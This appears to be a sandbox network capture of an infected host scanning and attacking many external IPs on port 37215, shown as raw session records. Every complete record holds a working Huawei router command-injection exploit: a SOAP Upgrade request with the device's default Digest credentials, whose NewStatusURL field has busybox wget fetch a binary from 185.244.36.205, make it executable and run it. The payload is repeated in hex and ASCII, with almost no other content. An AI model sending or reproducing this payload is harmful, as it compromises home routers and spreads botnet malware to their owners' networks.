                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              124192.168.2.153518494.192.136.3037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035542011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              125192.168.2.1539164156.246.100.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035552025 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              126192.168.2.156076694.218.120.11737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035623074 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              127192.168.2.1553158192.0.112.18837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035624027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              128192.168.2.1540014190.23.31.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035638094 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              129192.168.2.1560532138.42.206.16737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035641909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              130192.168.2.154914445.196.12.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035697937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              131192.168.2.154610894.33.68.23237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035701036 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              132192.168.2.1548168197.77.131.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035701036 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              133192.168.2.1544346197.112.218.18637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035769939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              134192.168.2.153796045.89.189.9637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.035779953 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
